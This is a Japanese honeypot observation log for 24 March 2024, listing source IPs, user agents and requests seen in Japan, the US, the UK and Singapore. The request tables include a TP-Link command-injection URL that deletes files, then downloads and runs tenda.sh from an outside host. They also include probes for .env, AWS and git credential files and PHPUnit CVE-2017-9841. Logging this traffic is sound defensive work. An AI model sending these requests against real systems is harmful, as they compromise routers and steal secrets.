2024/03/24 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/03/24分です。

特徴

共通

CensysInspectによるスキャン行為
/.envへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
/.gitへのスキャン行為

を確認しました。

Location:UK

TP-Link製品の脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為

を確認しました。

Location:SG

PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
curlによるスキャン行為
fasthttpによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：63 (前日比：-100)
US：総アクセス数：66 (前日比：-19)
UK：総アクセス数：82 (前日比：-25)
SG：総アクセス数：169 (前日比：31)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	36.99.136.128	China
1	45.56.108.128	United States
1	51.89.230.146	France
3	65.49.20.66	United States
2	71.6.134.230	United States
2	78.153.140.177	Russia
4	80.82.78.39	United Kingdom
1	87.121.69.52	Bulgaria
1	91.92.250.119	Bulgaria
4	93.174.95.106	United Kingdom
1	104.192.0.61	United States
1	117.248.26.234	India
3	135.125.217.54	France
11	135.125.246.110	France
5	141.98.255.143	Sweden
1	162.216.150.174	United States
13	170.64.228.219	United States
2	185.100.87.136	Seychelles
2	185.254.196.173	Ukraine
1	199.45.154.18	United States
1	199.45.155.51	United States
2	205.210.31.9	United States

UserAgent一覧

件数	UserAgent
17	`-`
1	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
2	`Go-http-client/1.1`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/16.3`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
17	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01H\x01`
12		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
18	GET	`/.env`	HTTP/1.1
1	GET	`/.ghauri`	HTTP/1.1
1	GET	`/.sqlmap`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7`	HTTP/1.1
1	POST	`/index.htm`	HTTP/1.1
1	POST	`/login`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.137.106.178	Singapore
1	20.171.146.81	United States
1	35.203.210.36	United States
1	35.203.210.143	United States
3	36.156.22.4	China
1	45.79.128.205	United States
1	45.79.181.104	United States
1	45.79.181.251	United States
1	45.83.65.108	Germany
3	54.36.115.221	France
4	54.37.79.75	France
2	57.129.23.166	France
1	65.49.1.66	United States
3	74.82.47.4	United States
2	78.153.140.179	Russia
1	80.66.88.215	Russia
2	80.94.92.60	Romania
4	87.121.69.52	Bulgaria
1	91.92.250.119	Bulgaria
1	106.75.133.175	China
1	106.75.173.108	China
1	122.194.9.196	China
1	134.122.26.255	United States
1	139.59.101.104	Singapore
6	152.32.212.149	Hong Kong
2	152.32.225.108	Hong Kong
2	162.142.125.224	United States
2	167.71.197.10	United States
2	167.71.201.66	United States
2	167.94.146.60	United States
2	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.242.173	United States
1	179.60.147.53	Belize
1	185.150.26.251	Netherlands
1	192.155.90.220	United States
2	205.210.31.146	United States
2	205.210.31.205	United States

UserAgent一覧

件数	UserAgent
24	`-`
2	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
10	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
10	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
1	`xxx`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
2		`\x03`
2		`\x16\x03\x01\x01\x07\x01`
14		`\x16\x03\x01`
4	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
10	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
4	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94[.]156[.]8[.]244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
6	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-admin/install.php`	HTTP/1.1
1	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	POST	`/api/v0/id`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
2	PRI	`*`	HTTP/2.0
1	t3	`12.1.2\n`

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	35.203.210.95	United States
1	45.79.128.205	United States
2	45.79.181.94	United States
1	45.83.64.36	Germany
1	45.227.254.8	Belize
1	54.37.79.75	France
19	57.129.23.166	France
1	64.62.197.79	United States
2	64.62.197.80	United States
1	64.62.197.217	United States
13	64.227.188.235	United States
1	66.175.213.4	United States
2	78.153.140.179	Russia
4	80.82.77.202	United Kingdom
4	80.82.78.39	United Kingdom
2	80.94.92.60	Romania
4	87.121.69.52	Bulgaria
1	91.92.250.119	Bulgaria
7	118.123.105.93	China
1	139.59.101.104	Singapore
1	162.216.149.83	United States
2	167.94.145.53	United States
2	167.94.146.53	United States
1	172.105.128.11	United States
1	173.44.141.174	United States
1	185.150.26.251	Netherlands
1	192.155.90.220	United States
2	198.235.24.31	United States
2	205.210.31.59	United States

UserAgent一覧

件数	UserAgent
30	`-`
2	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
5	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
21	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0`
1	`curl/8.1.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
27		`\x16\x03\x01`
4	CONNECT	`google[.]com:443`	HTTP/1.1
21	GET	`/.env`	HTTP/1.1
1	GET	`/.ghauri`	HTTP/1.1
1	GET	`/.sqlmap`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/aaa9`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94[.]156[.]8[.]244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.8.11.202	Russia
44	18.139.160.34	United States
1	35.203.210.197	United States
1	35.203.211.18	United States
33	43.157.39.184	Singapore
1	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.251	United States
1	45.83.64.245	Germany
1	45.227.254.49	Belize
10	54.36.115.221	France
1	64.62.197.43	United States
1	64.62.197.169	United States
1	64.62.197.173	United States
1	64.62.197.181	United States
13	64.227.188.235	United States
4	71.6.165.200	United States
4	80.82.78.39	United Kingdom
2	80.94.92.60	Romania
1	87.120.84.69	Bulgaria
4	87.121.69.52	Bulgaria
4	89.248.172.16	United Kingdom
1	91.92.250.119	Bulgaria
2	91.92.251.178	Bulgaria
3	103.56.61.130	China
2	162.142.125.214	United States
2	162.142.125.221	United States
4	164.52.0.94	China
2	167.94.138.35	United States
2	167.94.146.59	United States
2	167.248.133.51	United States
1	172.104.242.173	United States
2	173.205.93.154	United States
4	185.142.236.40	Seychelles
1	185.150.26.251	Netherlands
2	192.155.90.118	United States
1	192.155.90.220	United States
2	205.210.31.33	United States
2	205.210.31.107	United States
1	205.234.144.252	United States

UserAgent一覧

件数	UserAgent
35	`-`
2	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
6	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
44	`Mozilla/5.0 (Windows NT 10.0; Win64; x64)`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0`
33	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
12	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
5	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
1	`curl/8.1.2`
1	`fasthttp`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x03`
2		`\x16\x03\x01\x02`
17		`\x16\x03\x01`
4	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.aws/config`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.example`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env/backup`	HTTP/1.1
15	GET	`/.env`	HTTP/1.1
1	GET	`/.ghauri`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.git/credentials`	HTTP/1.1
1	GET	`/.hg`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.sqlmap`	HTTP/1.1
1	GET	`/.svn`	HTTP/1.1
4	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//api/.env`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/13.67.44.234/.env`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/Dockerrun.aws.json`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/.git/HEAD`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/.git/HEAD`	HTTP/1.1
2	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/audio/.env`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
2	GET	`/backend/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cgi-bin/.env`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94[.]156[.]8[.]244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/client/.git/HEAD`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/conf/.env`	HTTP/1.1
1	GET	`/config.inc.php`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config/default.json`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
2	GET	`/crm/.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
14	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
2	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/library/.env`	HTTP/1.1
2	GET	`/local/.env`	HTTP/1.1
1	GET	`/new/.env`	HTTP/1.1
1	GET	`/newsite/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
4	GET	`/robots.txt`	HTTP/1.1
1	GET	`/s3cmd.ini`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
3	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sites/all/libraries/mailchimp/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-admin/.env`	HTTP/1.1
1	GET	`/wp-config.php-backup`	HTTP/1.1
1	GET	`/wp-content/.env`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/www/.env`	HTTP/1.1
1	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
5	PRI	`*`	HTTP/2.0